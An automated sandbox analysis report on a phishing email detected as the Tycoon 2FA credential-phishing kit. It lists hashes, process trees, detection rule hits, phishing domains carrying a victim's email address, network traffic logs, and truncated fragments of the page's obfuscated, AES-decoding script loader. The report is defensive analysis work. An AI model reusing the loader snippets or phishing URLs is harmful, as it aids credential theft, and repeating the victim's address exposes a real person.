Edit tour

Windows Analysis Report
original.eml

Overview

General Information

Sample name:	original.eml
Analysis ID:	1528039
MD5:	2faa494e98f91452fe671513610826b9
SHA1:	e7b3e88ef7219532cc24c49d72f151e685495c81
SHA256:	5c5c7ace4ddb9ff4764b3050cee302ee0fb5d584010e8b3a033c571679934ae3
Infos:

Detection

Tycoon2FA

Score:	52
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected Tycoon 2FA PaaS

Phishing site detected (based on favicon image match)

Form action URLs do not match main URL

HTML body contains low number of good links

HTML page contains hidden javascript code

HTML page contains string obfuscation

HTML title does not match URL

Queries the volume information (name, serial number etc) of a device

Sigma detected: Office Autorun Keys Modification

Sigma detected: Suspicious Office Outbound Connections

Stores files to the Windows start menu directory

Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

Process Tree

System is w10x64_ra

OUTLOOK.EXE (PID: 6728 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\Desktop\original.eml" MD5: 91A5292942864110ED734005B7E005C0)

ai.exe (PID: 4196 cmdline: "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "FF7B597F-3020-4A6F-8172-218BC05F430F" "A618A75E-1B2B-41BA-B15A-12C1C9B0E6F3" "6728" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx" MD5: EC652BEDD90E089D9406AFED89A8A8BD)

chrome.exe (PID: 1388 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\DAFUMPZW\Metalus Remittance_7420249835_11053465.html MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6484 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 --field-trial-handle=1944,i,3455865811790200313,8750311825173435097,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 7984 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://aka.ms/LearnAboutSenderIdentification MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 8168 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=1844,i,8970548161277558720,12195311957042810965,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

OUTLOOK.EXE (PID: 3424 cmdline: "C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE" /eml "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\DAFUMPZW\phish_alert_sp2_2.0.0.0.eml" MD5: 91A5292942864110ED734005B7E005C0)

chrome.exe (PID: 4956 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\DAFUMPZW\Metalus Remittance_7420249835_11053465 (003).html MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 4136 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 --field-trial-handle=1928,i,4118263844888920036,16677394294465106818,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

Yara Signatures

HTML

Source	Rule	Description	Author	Strings
0.0.pages.csv	JoeSecurity_Tycoon2FA	Yara detected Tycoon 2FA PaaS	Joe Security

Sigma Signatures

Sigma detected: Office Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, ProcessId: 6728, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Outlook\Addins\OneNote.OutlookAddin\1

Sigma detected: Suspicious Office Outbound Connections

Source: Network Connection

Author: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.16, DestinationIsIpv6: false, DestinationPort: 57790, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE, Initiated: true, ProcessId: 6728, Protocol: tcp, SourceIp: 52.109.20.38, SourceIsIpv6: false, SourcePort: 443

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

Phishing

Yara detected Tycoon 2FA PaaS

Source: Yara match

File source: 0.0.pages.csv, type: HTML

Phishing site detected (based on favicon image match)

Source: https://cyt.sprenumen.ru/wJPIeL/#V#dlaurence.brochu@metalus.qc.ca

Matcher: Template: microsoft matched with high similarity

Source: https://support.microsoft.com/en-us/windows/protect-yourself-from-phishing-0c7ea947-ba98-3bd9-7184-430e1f860a44

HTTP Parser: Form action: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=ee272b19-4411-433f-8f28-5c13cb6fd407&redirect_uri=https%3A%2F%2Fsupport.microsoft.com%2Fsignin-oidc&response_type=code%20id_token&scope=openid%20profile%20offline_access&response_mode=form_post&nonce=638639013531968207.MzMxYjcwZjAtMGIwZC00OTdkLTg0MjQtMTA3ZjkzZTI1MTk1ZjMxNWJmYTktYTVlNS00ZWU1LWJkMjQtOGIxNDQ3MTEyZDE3&prompt=none&nopa=2&state=CfDJ8LWN6nmb9HBGpcIJvpEgkL3HwMWhC5CDSxc5fplJTzFedzTbmBtfPLgKDrSP3Smbo7snMUHggeNAAbFUCe-oMACqzRpqbYLASuvZLDeaEjpGoV59zseTjwPzpOJbEBwL_I1gDnJ5ay4JzJbjlO9Ru40iq6U874irOcfGDmwiuh5WzmU1kAR7RuxCLILWUfoQJE6g09uA1p_Qwtp1Fn3-qgIels25Th4F9SGPdn0IseMU6Kxz-Kf8eHtvUdJYNnOMFtoVTZl7q6W05WGLJYNQZ44mweK8mzBZM8D6M1E4UnGO3oLfBUzqeP-03kjNJO0bSRBavuKgIozbz0e9hbsd5EmRO6xNa-GtJfZVgeOrLhEk&x-client-SKU=ID_NET6_0&x-client-ver=8.0.2.0&sso_reload=true microsoft microsoftonline

Source: https://support.microsoft.com/en-us/windows/protect-yourself-from-phishing-0c7ea947-ba98-3bd9-7184-430e1f860a44

HTTP Parser: Number of links: 0

Source: https://cyt.sprenumen.ru/wJPIeL/#I#dlaurence.brochu@metalus.qc.ca

HTTP Parser: Base64 decoded: <svg xmlns="http://www.w3.org/2000/svg" width="32" height="32" fill="none" viewBox="0 0 26 26"><path fill="#d9d9d9" d="M13 0a13 13 0 1 0 0 26 13 13 0 0 0 0-26m0 24a11 11 0 1 1 0-22 11 11 0 0 1 0 22"/><path fill="#d9d9d9" d="m10.955 16.055-3.95-4.125-1.445...

Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/DAFUMPZW/Metalus%20Remittance_7420249835_11053465%20(003).html	HTTP Parser: Found new string: script document[giraffe]( upupa + ficus + '></sc' + 'ript>') ;...
Source: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/Content.Outlook/DAFUMPZW/Metalus%20Remittance_7420249835_11053465.html	HTTP Parser: Found new string: script document[giraffe]( upupa + ficus + '></sc' + 'ript>') ;...

Source: https://support.microsoft.com/en-us/windows/protect-yourself-from-phishing-0c7ea947-ba98-3bd9-7184-430e1f860a44

HTTP Parser: Title: Redirecting does not match URL

Source: https://web10.pro/res444.php?2-68747470733a2f2f4359542e737072656e756d656e2e72752f774a5049654c2f-kelp

HTTP Parser: var uozrsqgpvndpexxx = document.createelement("script");uozrsqgpvndpexxx.setattribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");document.head.append(uozrsqgpvndpexxx);uozrsqgpvndpexxx.onload=function(){var {a,b,c,d} = json.parse(atob("eyjhijoiblnxsit3bg1wmuu3b0rceg85ew1qyjq4wmnlufvqd2xlb3lxvehxbklkrurqduron3rnc1jxzzhiz2lynhvimwzhamjutnazwm1hou9jvvzuvxbxoxbeyznxavp0b1qxtxkwnuhvmglmdk9zcem5eknirmnemfwvs29tb1jurnrudhdvk0y0nfzxtm1ublpyrlh6wxywtw1tz2jpwvz1ueu2mw9ndgvyu2tcl05itjh5vjkzd0m5tef4ajlozgiyulzok2rbdgxcl2ezvziwqmzjsfbqvfjgdvrha3vgq2xnzgi4vflowtayse9jwnzuzevdetfea1prnljhbmxrzxiyvff6wkntvxvrzdhxcmdhxc9ubwmrmthkazrobtvcnxllejlkwwddzdzgakjzqitsswzcl3rldmpkdnveumrkvgnnvvvyzk1mnvp1t1huckfqzmg4cjvgzm5iwmorb1z2ehi1ynv6ynfdahfinghfbxqwk3dzcmron2w5wm5ivjrcl0s1ue1uzhpqy2m1ee1mdtlur0d5zwxdafi5vklwrnzxqkvkq1nhnnfuxc8yzedhk3nwudltv0vvdm5lmdltufcrxc9utfzjqwxwt2o4y1f0dvj2eeg2y0lnsum5dzi3xc9vn0fnt28rtuhquhl0mejqmlu2cjbydhhntgdtzlywsvh2xc92mgrhtlrclznsxc9mtuhfcmlvqtkrsgz3xc...

Source: https://support.microsoft.com/en-us/windows/protect-yourself-from-phishing-0c7ea947-ba98-3bd9-7184-430e1f860a44

HTTP Parser: Iframe src: https://login.live.com/Me.htm?v=3

Source: https://cyt.sprenumen.ru/wJPIeL/#I#dlaurence.brochu@metalus.qc.ca	HTTP Parser: No favicon
Source: https://support.microsoft.com/en-us/windows/protect-yourself-from-phishing-0c7ea947-ba98-3bd9-7184-430e1f860a44	HTTP Parser: No favicon
Source: https://support.microsoft.com/en-us/windows/protect-yourself-from-phishing-0c7ea947-ba98-3bd9-7184-430e1f860a44	HTTP Parser: No favicon
Source: https://support.microsoft.com/en-us/windows/protect-yourself-from-phishing-0c7ea947-ba98-3bd9-7184-430e1f860a44	HTTP Parser: No favicon
Source: https://cyt.sprenumen.ru/wJPIeL/#V#dlaurence.brochu@metalus.qc.ca	HTTP Parser: No favicon
Source: https://cyt.sprenumen.ru/wJPIeL/#V#dlaurence.brochu@metalus.qc.ca	HTTP Parser: No favicon

Source: https://support.microsoft.com/en-us/windows/protect-yourself-from-phishing-0c7ea947-ba98-3bd9-7184-430e1f860a44	HTTP Parser: No <meta name="author".. found
Source: https://support.microsoft.com/en-us/windows/protect-yourself-from-phishing-0c7ea947-ba98-3bd9-7184-430e1f860a44	HTTP Parser: No <meta name="author".. found

Source: https://support.microsoft.com/en-us/windows/protect-yourself-from-phishing-0c7ea947-ba98-3bd9-7184-430e1f860a44	HTTP Parser: No <meta name="copyright".. found
Source: https://support.microsoft.com/en-us/windows/protect-yourself-from-phishing-0c7ea947-ba98-3bd9-7184-430e1f860a44	HTTP Parser: No <meta name="copyright".. found

Source: unknown	HTTPS traffic detected: 52.109.20.38:443 -> 192.168.2.16:57790 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.190.160.20:443 -> 192.168.2.16:57796 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.190.160.20:443 -> 192.168.2.16:57801 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:57803 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:57806 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:57807 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:57989 version: TLS 1.2

Source: chrome.exe

Memory has grown: Private usage: 1MB later: 31MB

Source: unknown	TCP traffic detected without corresponding DNS query: 52.109.20.38
Source: unknown	TCP traffic detected without corresponding DNS query: 52.109.20.38
Source: unknown	TCP traffic detected without corresponding DNS query: 52.109.20.38
Source: unknown	TCP traffic detected without corresponding DNS query: 52.109.20.38
Source: unknown	TCP traffic detected without corresponding DNS query: 52.109.20.38
Source: unknown	TCP traffic detected without corresponding DNS query: 52.109.20.38
Source: unknown	TCP traffic detected without corresponding DNS query: 52.109.20.38
Source: unknown	TCP traffic detected without corresponding DNS query: 52.109.20.38
Source: unknown	TCP traffic detected without corresponding DNS query: 52.109.20.38
Source: unknown	TCP traffic detected without corresponding DNS query: 52.109.20.38
Source: unknown	TCP traffic detected without corresponding DNS query: 52.109.20.38
Source: unknown	TCP traffic detected without corresponding DNS query: 52.109.20.38
Source: unknown	TCP traffic detected without corresponding DNS query: 52.109.20.38
Source: unknown	TCP traffic detected without corresponding DNS query: 52.109.20.38
Source: unknown	TCP traffic detected without corresponding DNS query: 52.109.20.38
Source: unknown	TCP traffic detected without corresponding DNS query: 52.109.20.38
Source: unknown	TCP traffic detected without corresponding DNS query: 52.109.20.38
Source: unknown	TCP traffic detected without corresponding DNS query: 52.109.20.38
Source: unknown	TCP traffic detected without corresponding DNS query: 52.109.20.38
Source: unknown	TCP traffic detected without corresponding DNS query: 52.109.20.38
Source: unknown	TCP traffic detected without corresponding DNS query: 52.109.20.38
Source: unknown	TCP traffic detected without corresponding DNS query: 52.109.20.38
Source: unknown	TCP traffic detected without corresponding DNS query: 52.109.20.38
Source: unknown	TCP traffic detected without corresponding DNS query: 52.109.20.38
Source: unknown	TCP traffic detected without corresponding DNS query: 52.109.20.38
Source: unknown	TCP traffic detected without corresponding DNS query: 52.109.20.38
Source: unknown	TCP traffic detected without corresponding DNS query: 52.109.20.38
Source: unknown	TCP traffic detected without corresponding DNS query: 52.109.20.38
Source: unknown	TCP traffic detected without corresponding DNS query: 52.109.20.38
Source: unknown	TCP traffic detected without corresponding DNS query: 52.109.20.38
Source: unknown	TCP traffic detected without corresponding DNS query: 52.109.20.38
Source: unknown	TCP traffic detected without corresponding DNS query: 52.109.20.38
Source: unknown	TCP traffic detected without corresponding DNS query: 52.109.20.38
Source: unknown	TCP traffic detected without corresponding DNS query: 52.109.20.38
Source: unknown	TCP traffic detected without corresponding DNS query: 52.109.20.38
Source: unknown	TCP traffic detected without corresponding DNS query: 52.109.20.38
Source: unknown	TCP traffic detected without corresponding DNS query: 52.109.20.38
Source: unknown	TCP traffic detected without corresponding DNS query: 52.109.20.38
Source: unknown	TCP traffic detected without corresponding DNS query: 52.109.20.38
Source: unknown	TCP traffic detected without corresponding DNS query: 52.109.20.38
Source: unknown	TCP traffic detected without corresponding DNS query: 52.109.20.38
Source: unknown	TCP traffic detected without corresponding DNS query: 52.109.20.38
Source: unknown	TCP traffic detected without corresponding DNS query: 52.109.20.38
Source: unknown	TCP traffic detected without corresponding DNS query: 52.109.20.38
Source: unknown	TCP traffic detected without corresponding DNS query: 52.109.20.38
Source: unknown	TCP traffic detected without corresponding DNS query: 52.109.20.38
Source: unknown	TCP traffic detected without corresponding DNS query: 52.109.20.38
Source: unknown	TCP traffic detected without corresponding DNS query: 52.109.20.38
Source: unknown	TCP traffic detected without corresponding DNS query: 52.109.20.38
Source: unknown	TCP traffic detected without corresponding DNS query: 52.109.20.38

Source: global traffic	DNS traffic detected: DNS query: web10.pro
Source: global traffic	DNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: cyt.sprenumen.ru
Source: global traffic	DNS traffic detected: DNS query: code.jquery.com
Source: global traffic	DNS traffic detected: DNS query: challenges.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global traffic	DNS traffic detected: DNS query: aka.ms
Source: global traffic	DNS traffic detected: DNS query: support.content.office.net
Source: global traffic	DNS traffic detected: DNS query: c.s-microsoft.com
Source: global traffic	DNS traffic detected: DNS query: js.monitor.azure.com
Source: global traffic	DNS traffic detected: DNS query: aadcdn.msftauth.net
Source: global traffic	DNS traffic detected: DNS query: mem.gfx.ms
Source: global traffic	DNS traffic detected: DNS query: login.microsoftonline.com
Source: global traffic	DNS traffic detected: DNS query: assets.onestore.ms
Source: global traffic	DNS traffic detected: DNS query: microsoftwindows.112.2o7.net
Source: global traffic	DNS traffic detected: DNS query: logincdn.msftauth.net
Source: global traffic	DNS traffic detected: DNS query: acctcdn.msftauth.net
Source: global traffic	DNS traffic detected: DNS query: xqe94soygyl0xmmn7oi0raibl6rn1ojg7he0qyjbvy1xxkrsv028hloblup.zentriva.su
Source: global traffic	DNS traffic detected: DNS query: noon.com
Source: global traffic	DNS traffic detected: DNS query: www.noon.com

Source: unknown	Network traffic detected: HTTP traffic on port 58031 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57806
Source: unknown	Network traffic detected: HTTP traffic on port 57819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57801
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57804
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57925
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57803
Source: unknown	Network traffic detected: HTTP traffic on port 58039 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57921
Source: unknown	Network traffic detected: HTTP traffic on port 58016 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58019 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57860 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57989 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57834 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57914 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57908 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57819
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57818
Source: unknown	Network traffic detected: HTTP traffic on port 57843 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57934
Source: unknown	Network traffic detected: HTTP traffic on port 57925 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57935
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57811
Source: unknown	Network traffic detected: HTTP traffic on port 58034 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57946 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58040 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58027 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57846 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57827
Source: unknown	Network traffic detected: HTTP traffic on port 57827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57829
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57824
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57945
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57823
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57944
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57826
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57946
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57820
Source: unknown	Network traffic detected: HTTP traffic on port 57903 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58033 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57821
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57796
Source: unknown	Network traffic detected: HTTP traffic on port 58020 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57790
Source: unknown	Network traffic detected: HTTP traffic on port 57945 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57912 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58028 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57839
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57838
Source: unknown	Network traffic detected: HTTP traffic on port 57824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57835
Source: unknown	Network traffic detected: HTTP traffic on port 58036 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57834
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57837
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57958
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57836
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58007
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57830
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57833
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57799
Source: unknown	Network traffic detected: HTTP traffic on port 57835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57840
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58016
Source: unknown	Network traffic detected: HTTP traffic on port 57917 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57804 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57934 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58025 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58029 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57844 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57846
Source: unknown	Network traffic detected: HTTP traffic on port 57829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57845
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57847
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57842
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58018
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57841
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58017
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57844
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57843
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58019
Source: unknown	Network traffic detected: HTTP traffic on port 58035 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58025
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58024
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58027
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58026
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58021
Source: unknown	Network traffic detected: HTTP traffic on port 57838 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58020
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58023
Source: unknown	Network traffic detected: HTTP traffic on port 57841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57876 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57910 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58026 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58030 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58029
Source: unknown	Network traffic detected: HTTP traffic on port 57921 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58028
Source: unknown	Network traffic detected: HTTP traffic on port 58038 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57790 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57860
Source: unknown	Network traffic detected: HTTP traffic on port 58017 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58036
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58035
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57862
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58038
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57861
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58037
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58032
Source: unknown	Network traffic detected: HTTP traffic on port 57806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58031
Source: unknown	Network traffic detected: HTTP traffic on port 57833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57861 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58034
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58033
Source: unknown	Network traffic detected: HTTP traffic on port 58023 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58030
Source: unknown	Network traffic detected: HTTP traffic on port 57915 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57908
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57842 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57989
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57903
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57864
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58039
Source: unknown	Network traffic detected: HTTP traffic on port 58037 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57916 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57881 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58043
Source: unknown	Network traffic detected: HTTP traffic on port 57862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57836 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58024 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57935 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 58040
Source: unknown	Network traffic detected: HTTP traffic on port 58007 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58043 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57916
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57915
Source: unknown	Network traffic detected: HTTP traffic on port 57845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57917
Source: unknown	Network traffic detected: HTTP traffic on port 57958 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57912
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57914
Source: unknown	Network traffic detected: HTTP traffic on port 57796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58032 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57910
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57876
Source: unknown	Network traffic detected: HTTP traffic on port 58018 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 57881
Source: unknown	Network traffic detected: HTTP traffic on port 57944 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 57839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 58021 -> 443

Source: unknown	HTTPS traffic detected: 52.109.20.38:443 -> 192.168.2.16:57790 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.190.160.20:443 -> 192.168.2.16:57796 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.190.160.20:443 -> 192.168.2.16:57801 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:57803 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:57806 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:57807 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.16:57989 version: TLS 1.2

Source: classification engine

